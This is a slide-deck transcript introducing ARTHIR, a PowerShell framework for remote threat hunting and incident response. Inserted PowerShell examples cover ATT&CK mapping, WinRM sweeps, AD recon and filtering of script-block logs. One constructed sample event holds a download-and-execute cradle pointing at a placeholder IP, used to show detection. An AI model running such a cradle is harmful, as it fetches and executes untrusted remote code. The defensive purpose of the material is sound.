Michael Gough – Co-Founder
IMF Security.com
LOG-MD.com
Whoami
• Blue Team Defender Ninjas, Incident Responder, Threat Hunter,
Logaholic
• Michael – Creator of all those Windows Logging Cheat Sheets and
the Malware Management Framework
• Co-Creator of “Log-MD” – The Log and Malicious Discovery Tool
• BDIR Podcast - “Brakeing Down Incident Response”
• Special SHOUT OUT to
– Olaf Hartong @OlafHartong
– Josh Rickard @MSAdministrator
The Challenge
So what’s the problem?
• There is an event
• We would like to investigate it
• We walk in with our laptops
– Or you use one of your systems
• What tools can you or we use to look across
all your Windows systems?
• Without installing anything!!!!
• Using what is already on all Windows systems
What are our options?
• Use what we already have like SCCM, BigFix, etc.
• Install a tool with an agent, deal with more agent bloat and
agent interaction
• Remote into the system
• Do a forensics acquisition
• Use what is already on the system, living-off-the-land
• What we need is already found on all Windows systems!
• How can we share what we do with enterprise solutions?
• Use something the community can contribute to
The Challenge
• Whether you are a Blue Teamer investigating
your own environment
• Or a consultant investigating a client
• We need a way to execute a wide range of
tools, utilities and scripts remotely to 1, 100 or
1000 systems
• It needs to be flexible enough to allow us to
run, respond, and hunt for many things
Requirements
• Fits on a thumb drive
• Can run scripts
• Can run tools (no GUI)
• Can run utilities (no GUI)
• Can run larger jobs (Hash/Registry snapshots)
• Schedule Jobs that can run things on a regular
basis
Requirements
• Walk in with a laptop
• Or use one of your systems
• Domain attached and domain creds
• No requirement to install anything
• Well… we want you to upgrade to PowerShell v5
• PS v5 is the only way to get good PowerShell
logging
– You didn’t think I was going to skip the Malware Archaeology Cheat Sheets, did you?
What do you have and use?
• What tools do you use for Threat Hunting and
Incident Response?
• A bunch of utilities, tools, scripts?
• An EDR/EPP solution?
• Open Source tools and projects?
• Do you have anything?
• More importantly do you have budget?
My Top 10 List of tools
1. Log Management
– Centralize data collection
– Query all the data
2. BigFix or equivalent
– Query anything you want on a system
– Run scripts, utilities, tools, etc.
– Run remediation jobs
3. LOG-MD
– Log Harvesting
– Hunting
– AutoRuns
– PowerShell
– SRUM
– Much more
My Top 10
4.
5.
6.
7.
8.
9.
10.
The problem I wanted to solve
• I want to query all the things #2
• I want to run scripts, utilities, tools #2
• I want to have the option to centralize the
data #1
• I want to query that data #1
• I don’t want to, or can’t install anything
• Of course I want to run my favorite utility/tool
– LOG-MD-Professional
The problem I wanted to solve
• I am one of the creators of LOG-MD
• It is a great utility/tool
• It does a LOT of what I need to investigate a system
• I just needed a way to run it remotely on 1, 100 or
1000 systems to do Threat Hunting and/or Incident
Response
• And pull back the reports and organize them
• Maybe even collect them into a Log Management
solution #1
• Without an enterprise solution like BigFix #2
Get to it
3 years ago…
• We announced LOG-MD at
this very conference
• Today we would like to announce the release of…
• ARTHIR: ATT&CK Remote Threat Hunting Incident Response
ARTHIR.com
PowerShell?
• PowerShell is on every Windows system
• Can we use that?
• But can we run our own special binaries?
• We love our own tools
• Create scripts
• Something modular
• Allows for community support
• A modular framework
• Leverages an existing project that we modified
to do what we wanted and needed
• KANSA was good, but lacked some capabilities
• I needed to run all features of LOG-MD and
pull the reports back
• KANSA did not work well at all for LOG-MD
• And run other utilities, say Sysinternals
• So KANSA did some kewl stuff, just not enough
• So we modified it
• We had a couple issues
• Olaf Hartong helped us with report retrieval
• Josh Rickard helped us with scheduled tasks
• Once these changes were added suddenly we
had something that gave me a LOT of what
BigFix could do
MITRE ATT&CK™
What does ATT&CK have to do with it?
• We LOVE MITRE ATT&CK
• It is a GREAT place to map your hunts to
• Or what to detect and hunt for
• It’s what your adversaries ACTUALLY do in
their attacks
• If you can detect and/or hunt for the
techniques in MITRE ATT&CK… you are WAY
ahead of most
MITRE ATT&CK™
• The A in ARTHIR stands for ATT&CK™
• The idea here is to encourage you and anyone
making modules to map their efforts to MITRE
ATT&CK
• Help us Help the rest of us
• Take this information and any other detection
and hunting you can do and add it to YOUR
own ATT&CK Matrix
Add your ATT&CK Mappings
• Check MITRE ATT&CK Tactics and Techniques
and add them to the ARTHIR module
• Map them to an overall matrix
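One way to take the mappings out of a spreadsheet and onto an actual matrix, as an added example written for this page (it is not ARTHIR's ATT&CK spreadsheet template or any ARTHIR code): a small PowerShell function that turns module-to-technique pairs into an ATT&CK Navigator layer file. The module-to-technique pairs, the technique choices, and the layer/navigator version numbers are all assumptions for illustration, not ARTHIR's official mappings.

```powershell
# Added example, not part of ARTHIR: write an ATT&CK Navigator layer from a
# module -> technique mapping so coverage can be viewed at
# https://mitre.github.io/attack-navigator/ (File > Open Existing Layer).
# The mappings and the version strings below are assumed for illustration.
function New-AttackLayer {
    param(
        [Parameter(Mandatory)][string]$Name,
        [Parameter(Mandatory)][object[]]$Mappings,   # objects with Module, Technique, Note
        [string]$Path = '.\ARTHIR-coverage.json'
    )
    # Several modules may hit one technique: aggregate so the score (and so the
    # cell colour in Navigator) reflects how many modules produce evidence for it.
    $techniques = $Mappings | Group-Object Technique | ForEach-Object {
        [ordered]@{
            techniqueID = $_.Name
            score       = $_.Count
            enabled     = $true
            comment     = ($_.Group | ForEach-Object { "$($_.Module): $($_.Note)" }) -join ' | '
        }
    }
    $layer = [ordered]@{
        name        = $Name
        versions    = [ordered]@{ attack = '14'; navigator = '4.9.1'; layer = '4.5' }  # assumed versions
        domain      = 'enterprise-attack'
        description = 'Techniques an ARTHIR module collects evidence for (score = number of modules)'
        techniques  = @($techniques)
        gradient    = [ordered]@{ colors = @('#ffffff', '#66b1ff', '#1f5fbf'); minValue = 0; maxValue = 3 }
    }
    $layer | ConvertTo-Json -Depth 6 | Set-Content -Path $Path -Encoding UTF8
    return $layer
}

# Illustrative mappings (assumed for this example, not ARTHIR's own).
$mappings = @(
    [pscustomobject]@{ Module = 'Kansa_Legacy\Net\Get-Netstat.ps1';                 Technique = 'T1049';     Note = 'unexpected established or listening connections' }
    [pscustomobject]@{ Module = 'Kansa_Legacy\Net\Get-Arp.ps1';                     Technique = 'T1016';     Note = 'ARP table as lateral-movement reconnaissance' }
    [pscustomobject]@{ Module = 'Kansa_Legacy\Net\Get-DNS-Cache.ps1';               Technique = 'T1071.004'; Note = 'cached names used for DNS C2 or staging' }
    [pscustomobject]@{ Module = 'Kansa_Legacy\Net\Get-DNS-Cache.ps1';               Technique = 'T1016';     Note = 'resolver activity during discovery' }
    [pscustomobject]@{ Module = 'Kansa_Legacy\Config\Get-Local_Admin_Accounts.ps1'; Technique = 'T1136.001'; Note = 'newly created local admin accounts' }
    [pscustomobject]@{ Module = 'Kansa_Legacy\Config\Get-Anti-MW-HealthStatus.ps1'; Technique = 'T1562.001'; Note = 'AV disabled or out of date' }
)
$layer = New-AttackLayer -Name 'ARTHIR module coverage' -Mappings $mappings
'{0} techniques written to the layer' -f $layer.techniques.Count
```

The score is the module count rather than a flat 1 so that a technique you can hunt three different ways stands out from one you cover only incidentally. Keep the mapping data next to modules.conf and regenerate the layer whenever a module is added; a hand-maintained matrix drifts from the tooling within a few releases.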
Cheat Sheets
• We released two ATT&CK cheat sheets as a
part of my SANS THIR talk in NOLA last year
• The goal was to see how good (or bad) really good logging would be at detecting or hunting the techniques in ATT&CK
• It was shocking how much coverage there was
• Over 80%
Fill out YOUR ATT&CK Matrix
Remote
• The R in ARTHIR stands for Remote
• We need to be able to hunt and respond
remotely
• Execute what we want on 1, 10, 100, or 1000
systems
• And not 1 by 1 like you would have to with RDP
or some EDRs
• Bring back results to a central system
• Like BigFix can do
Threat Hunting
• The TH in ARTHIR stands for Threat Hunting
• We need to be able to hunt for artifacts from
the techniques the adversaries use
• Run additional tools and utilities to hunt
• Centrally send results to say… log
management
Incident Response
• The IR in ARTHIR stands for Incident Response
• We need to be able to respond to an attack
• Do additional investigation from an alert
• Run additional tools and utilities
• Centrally send results to say… log
management
Modular
• We used the KANSA framework
• Even ported a few of the KANSA modules
• This framework design worked for us, no
reason to totally reinvent the wheel
• Create a module, add it to modules.conf
• Run the execution parameters
• Retrieve the reports
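What "execute on 1, 100 or 1000 systems and bring the reports back" looks like underneath, as an added example written for this page (it is not ARTHIR.ps1 or one of its modules): read Hosts.txt, run one script block on every host in parallel over WinRM, have each host write a report into a per-host folder, then pull the reports back over the same sessions with Copy-Item -FromSession. It assumes WinRM is enabled on the targets, the domain account used is a local admin on them, and uses C:\ARTHIR\Reports as a hypothetical remote working folder.

```powershell
# Added example, not ARTHIR code: the WinRM pattern a remote hunting framework
# is built on. Run a "module" (script block) on every host in Hosts.txt, have
# each host drop a report locally, then retrieve the reports into Output\<host>\.
# Assumptions: WinRM on, domain creds that are local admin on the targets,
# C:\ARTHIR\Reports as a hypothetical remote working folder.
param(
    [string]$HostsFile = '.\Hosts.txt',
    [string]$OutputDir = '.\Output',
    [string]$RemoteDir = 'C:\ARTHIR\Reports',   # hypothetical, not an ARTHIR default
    [int]$Throttle     = 32,
    [pscredential]$Credential = (Get-Credential -Message 'Domain account for remoting')
)

# Blank lines and '#' comments in Hosts.txt are ignored.
$targets = @(Get-Content $HostsFile | Where-Object { $_ -and $_ -notmatch '^\s*#' })

# The "module": listening TCP ports with the owning process, written as CSV so
# the per-host reports stack into one table afterwards.
$module = {
    param($RemoteDir)
    New-Item -ItemType Directory -Path $RemoteDir -Force | Out-Null
    $report = Join-Path $RemoteDir "$env:COMPUTERNAME-Listeners.csv"
    Get-NetTCPConnection -State Listen | ForEach-Object {
        $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Host = $env:COMPUTERNAME; LocalAddress = $_.LocalAddress; LocalPort = $_.LocalPort
            PID  = $_.OwningProcess; Process = $p.ProcessName; Path = $p.Path
        }
    } | Export-Csv -Path $report -NoTypeInformation
    $report   # returned to the caller, which is how it learns what to retrieve
}

# One session per host. Hosts that are offline, have WinRM closed, or refuse the
# credential are reported and skipped instead of aborting the whole sweep.
$sessions = @(New-PSSession -ComputerName $targets -Credential $Credential `
                 -ThrottleLimit $Throttle -ErrorAction SilentlyContinue)
$targets | Where-Object { $_ -notin $sessions.ComputerName } |
    ForEach-Object { Write-Warning "No session to $_ (offline, WinRM off, or access denied)" }
if ($sessions.Count -eq 0) { throw 'No sessions established; nothing to run.' }

# Execution: the same script block on all hosts at once, $Throttle at a time.
$remoteReports = Invoke-Command -Session $sessions -ScriptBlock $module `
                     -ArgumentList $RemoteDir -ThrottleLimit $Throttle

# Retrieval: each returned path carries PSComputerName, so it maps back to its session.
foreach ($r in $remoteReports) {
    $s    = $sessions | Where-Object ComputerName -eq $r.PSComputerName
    $dest = Join-Path $OutputDir $r.PSComputerName
    New-Item -ItemType Directory -Path $dest -Force | Out-Null
    Copy-Item -FromSession $s -Path $r -Destination $dest
}
Remove-PSSession $sessions

# Stack the reports: a listener owned by a process that only one host has is a
# good place to start hunting.
Get-ChildItem -Path $OutputDir -Recurse -Filter *.csv |
    ForEach-Object { Import-Csv $_.FullName } |
    Group-Object Process, LocalPort | Sort-Object Count |
    Format-Table Name, Count -AutoSize
```

Copy-Item -FromSession needs PowerShell 5.0 or later on the analyst side, which is one more reason for the v5 requirement earlier in the deck; it also means retrieval rides the existing WinRM session rather than needing the admin$ share open. Leave the remote report folder in place until retrieval succeeds, then run a cleanup module; deleting on the target before the copy is confirmed is how reports get lost on a flaky link.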
RECON
• We provided some PowerShell scripts to get
system names from Active Directory
• You need to build a list of systems
• And we provided a Ping script so you can test
those system names are alive
• Add these to Hosts.txt to run your modules
against
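Building that list, as an added example written for this page (it is not the Recon scripts that ship with ARTHIR): pull enabled Windows computers from Active Directory, check which ones actually answer, and write the live ones to Hosts.txt. It assumes the ActiveDirectory module (RSAT) is on the analyst box along with domain creds; when the module is missing, a constructed sample list stands in for AD so the script still runs.

```powershell
# Added example (not ARTHIR's Recon scripts): build Hosts.txt from Active
# Directory and keep only the hosts that answer. Assumes the ActiveDirectory
# module plus domain creds; falls back to a constructed sample list otherwise.
function Get-CandidateHosts {
    param([string]$SearchBase)   # optional OU, e.g. 'OU=Workstations,DC=corp,DC=example' (hypothetical)
    if (Get-Module -ListAvailable -Name ActiveDirectory) {
        Import-Module ActiveDirectory
        # Enabled Windows machines only; stale or disabled objects just slow the sweep.
        $query = @{ Filter     = 'Enabled -eq $true -and OperatingSystem -like "*Windows*"'
                    Properties = 'DNSHostName', 'OperatingSystem' }
        if ($SearchBase) { $query.SearchBase = $SearchBase }
        Get-ADComputer @query | Where-Object DNSHostName | Select-Object -ExpandProperty DNSHostName
    }
    else {
        # Constructed sample names, used only when AD is not reachable from here.
        'ws01.corp.example', 'ws02.corp.example', 'srv-file01.corp.example'
    }
}

function Test-HostsAlive {
    param(
        [Parameter(ValueFromPipeline)][string[]]$ComputerName,
        [switch]$UseWSMan   # test the WinRM listener instead of ICMP
    )
    process {
        foreach ($name in $ComputerName) {
            if ($UseWSMan) {
                # Host firewalls often drop ICMP while TCP 5985 is open; WinRM is what
                # remote modules need, so this is the more honest liveness check.
                $alive = [bool](Test-WSMan -ComputerName $name -ErrorAction SilentlyContinue)
            }
            else {
                $alive = Test-Connection -ComputerName $name -Count 1 -Quiet -ErrorAction SilentlyContinue
            }
            [pscustomobject]@{ ComputerName = $name; Alive = $alive }
        }
    }
}

$hostsFile = Join-Path (Get-Location) 'Hosts.txt'   # ARTHIR reads its targets from Hosts.txt
$results   = @(Get-CandidateHosts | Test-HostsAlive -UseWSMan)
$results | Where-Object Alive | Select-Object -ExpandProperty ComputerName | Set-Content -Path $hostsFile
$results | Where-Object { -not $_.Alive } |
    ForEach-Object { Write-Warning "$($_.ComputerName) did not answer; left out of Hosts.txt" }
'{0} of {1} hosts alive, written to {2}' -f @($results | Where-Object Alive).Count, $results.Count, $hostsFile
```

A ping sweep answers "is it up?"; the -UseWSMan switch answers "can I actually run a module on it?", which is the question that matters here, and it costs one HTTP request per host. Hosts that fail both checks still belong on a separate list: a machine that AD says is enabled but never answers is itself worth a look during an incident.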
Available modules
• Several more popular KANSA modules have
been converted
• More will be done as we move forward and need them
• We provided templates so YOU can do it too
• Remember that ‘community can contribute’
statement from earlier?
Root Directory
• ATT&CK: Some ATT&CK Matrix you can use
• Documentation: How To Documentation
• Known 3rd-Party: Known 3rd party modules for ARTHIR
• Modules: Where all the modules are and modules.conf
• Recon: Where Recon scripts live
• ARTHIR.ps1: The main ARTHIR script
• Hosts.txt: Where you place hosts to run modules on
Module types
• Bin: Where you place .EXE and Zip files
• Cleanup: Module(s) to delete ARTHIR remnants
• Info: Modules to collect info about a system
• Kansa_Legacy: Converted KANSA modules
• LOG-MD: All LOG-MD modules
• LOG-MD_Tasks: Modules to schedule LOG-MD hourly/daily
• Sysinternals: Converted KANSA Sysinternals modules
• Templates: Templates to make your own modules
KANSA converted modules
### Configuration modules
# Kansa_Legacy\Config\Get-Anti-MW-HealthStatus.ps1
# Kansa_Legacy\Config\Get-Anti-MW-InfectionStatus.ps1
# Kansa_Legacy\Config\Get-Hotfix_Patches.ps1
# Kansa_Legacy\Config\Get-Local_Accounts.ps1
# Kansa_Legacy\Config\Get-Local_Admin_Accounts.ps1
### Log modules
# Kansa_Legacy\Log\Get-AppCompatCache.ps1
# Kansa_Legacy\Log\Get-CBS_Log.ps1
### Disk modules
# Kansa_Legacy\Disk\Get-Temp_Dir_Listing.ps1
# Kansa_Legacy\Disk\Get-User_Name_Dir_Listing.ps1
# Kansa_Legacy\Disk\Get-User_Name_Dir_Listing_List_of_Extensions.ps1
# Kansa_Legacy\Disk\Get-Users_Dir_Listing.ps1
### Network modules
# Kansa_Legacy\Net\Get-Arp.ps1
# Kansa_Legacy\Net\Get-DNS-Cache.ps1
# Kansa_Legacy\Net\Get-Net-IP-Interface.ps1
# Kansa_Legacy\Net\Get-Netstat.ps1
### Cleanup/Delete ARTHIR folders
# CleanupGetDelete_ARTHIR_Folders.ps1
Templates
• Get-Binary-Template.ps1
• Get-Script-Template.ps1
• Get-Task-Template-Daily.ps1
• Get-Task-Template-Hourly.ps1
• Get-Zip-Template.ps1
• Variables are used to make editing/changing modules easier than in KANSA
Modules for Utility/Tools
• LOG-MD… Duh
• LOG-MD Free Edition
• LOG-MD-Professional, all features
• LOG-MD-Professional Tasks, Hourly & Daily
• Sysinternals – Sigcheck
• Sysinternals - Handle
DEMO
You will make PowerShell noise
• Since ARTHIR uses PowerShell…
• And adversaries use PowerShell too
• You will add events to the PowerShell logs
• So test and whitelist the script blocks that ARTHIR creates
• That makes it easier to hunt the bad
• LOG-MD provides a Whitelist_PowerShell.txt with many exclusions
Some ARTHIR PS Exclusions
# ARTHIR related items to exclude known ARTHIR components
#
*ARTHIR - *
*## ARTHIR*
*$ARTHIR_Dir*
*CODE ARTHIR*
*ARTHIR*
*$ARTHIR_OutputDir*
*value="ProcessName. ProcId. HandleId. Owner. Type. Perms. Name*
*Write-Output "Prefetch not enabled on*
#
# More generic ARTHIR scriptblocks
#
*PackageManagement.format.ps1xml*
*NestedModules="Microsoft.PowerShell.Commands.Management.dll*
*RootModule = "Microsoft.PowerShell.PackageManagement.dll*
*System.Management.Automation.PSDriveInfo] $driveInfo*
*Microsoft.PowerShell.Management\Test-Path $pathToValidate*
*Microsoft.PowerShell.Management\Test-Path $getPathItems*
*function PSCopyFileFromRemoteSession*
*function PSGetFileMetadata*
*function PerformCopyFileFromRemoteSession*
*function PSSourceSupportsAlternateStreams*
*indentString = "+ PSComputerName : " + $originInfo.PSComputerName*
*-ne "NativeCommandErrorMessage" -and $ErrorView -ne "CategoryView*
*# .ExternalHelp System.Management.Automation.dll-help.xml*
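How an exclusion list in this shape gets applied, as an added example written for this page (it is not LOG-MD's own whitelist engine): the wildcard lines are matched against the script block text of PowerShell Script Block Logging events (Event ID 4104, Microsoft-Windows-PowerShell/Operational), and whatever no pattern matches is what a hunter should read. It assumes the file format shown on the slide (one wildcard per line, `#` for comments); the three events it runs over are constructed for the example, not pulled from a real host.

```powershell
# Added example, not LOG-MD code: apply a Whitelist_PowerShell.txt-style
# exclusion list to 4104 script block events. Assumes the slide's file format;
# the sample events below are constructed.
function Import-PSWhitelist {
    param([string[]]$Lines)
    # Keep wildcard patterns only; blank lines and '#' comments are skipped.
    $Lines | ForEach-Object { $_.Trim() } | Where-Object { $_ -and -not $_.StartsWith('#') }
}

function Test-ScriptBlockWhitelisted {
    param([string]$ScriptBlockText, [string[]]$Patterns)
    foreach ($p in $Patterns) {
        # -like is a case-insensitive wildcard match, the same semantics the '*...*' lines expect.
        if ($ScriptBlockText -like $p) { return $true }
    }
    return $false
}

function Get-SuspiciousScriptBlocks {
    param([object[]]$Events, [string[]]$Patterns)
    foreach ($e in $Events) {
        # For a real 4104 record from Get-WinEvent, Properties[2] is ScriptBlockText;
        # the constructed sample objects carry the text as .Text instead.
        $text = if ($e.PSObject.Properties['Properties']) { $e.Properties[2].Value } else { $e.Text }
        if (-not (Test-ScriptBlockWhitelisted -ScriptBlockText $text -Patterns $Patterns)) {
            [pscustomobject]@{ TimeCreated = $e.TimeCreated; ScriptBlock = $text }
        }
    }
}

# A few lines in the slide's format (normally read with Get-Content Whitelist_PowerShell.txt).
$patterns = Import-PSWhitelist -Lines @(
    '# ARTHIR related items to exclude known ARTHIR components',
    '*ARTHIR*',
    '*function PSCopyFileFromRemoteSession*',
    '*PackageManagement.format.ps1xml*'
)

# Constructed sample events: two ARTHIR-generated blocks and one download cradle.
$sample = @(
    [pscustomobject]@{ TimeCreated = [datetime]'2019-05-01T10:00:01'; Text = '## ARTHIR module: Get-Netstat' }
    [pscustomobject]@{ TimeCreated = [datetime]'2019-05-01T10:00:03'; Text = 'function PSCopyFileFromRemoteSession { param($sessionName) }' }
    [pscustomobject]@{ TimeCreated = [datetime]'2019-05-01T10:02:44'; Text = 'IEX (New-Object Net.WebClient).DownloadString("http://198.51.100.7/a.ps1")' }
)

# Live use: replace $sample with the real log.
# $sample = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
Get-SuspiciousScriptBlocks -Events $sample -Patterns $patterns | Format-Table -Wrap
```

Only the download cradle survives the filter. The caveat to keep in mind: a bare `*ARTHIR*` also excludes anything an adversary chooses to stamp with that string once they have read your whitelist, so prefer the more specific patterns (the `$ARTHIR_Dir`, `## ARTHIR` and function-name lines) where they are enough, and review what the broad ones swallow now and then.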
Conclusion
• Try it you’ll like it
• Mikey does…
• Contribute
• Send us ideas
• It’s Open Source on GitHub
• www.ARTHIR.com
Resources
Cheat Sheets
• Windows ATT&CK Logging Cheat Sheet
• Windows ATT&CK LOG-MD Cheat Sheet
– www.MalwareArchaeology.com/cheat-sheets
• ATT&CK Matrix Spreadsheet template
– Comes with ARTHIR
Get ARTHIR
• www.ARTHIR.com
• https://github.com/MalwareArchaeology/ARTHIR
MITRE ATT&CK™ Sites
MITRE ATTACK
• https://attack.mitre.org/
Enterprise
• https://attack.mitre.org/techniques/enterprise/
ATT&CK Navigator
• https://mitre.github.io/attack-navigator/enterprise/
Recommended Sites
OSSEM - Open Source Security Events Metadata
• https://github.com/Cyb3rWard0g/OSSEM
SOCPrime SIGMA to SIEM converter
• https://uncoder.io/
SIGMA - Generic Signature Format for SIEM Systems
• https://github.com/Neo23x0/sigma
Red Canary Atomic Red Team
• https://atomicredteam.io/
MATE - MITRE ATT&CK® Technique Emulation
• https://github.com/fugawi/mate
Atomic Threat Coverage
• https://github.com/krakow2600/atomic-threat-coverage
Recommended Sites
The ThreatHunter-Playbook
• https://github.com/Cyb3rWard0g/ThreatHunter-Playbook
Olaf Hartong
ThreatHunting | A Splunk app mapped to MITRE
ATT&CK to guide your threat hunts
• https://github.com/olafhartong/ThreatHunting
Sysmon-modular | A Sysmon configuration
repository for everybody to customize
• https://github.com/olafhartong/sysmon-modular
Videos
MITRE ATT&CKCon
• https://www.youtube.com/playlist?list=PLkTApXQou_8JrhtrFDfAskvMqk97Yu2S2
Questions
• You can find us on the Twitters
– @HackerHurricane
• LOG-MD.com
• MalwareArchaeology.com
• Preso will be on SlideShare and linked on
MalwareArchaeology.com
• Listen to the PodCast to hear the rest of this topic
– http://www.brakeingdownir.libsyn.com/
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 

Último (20)

Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 

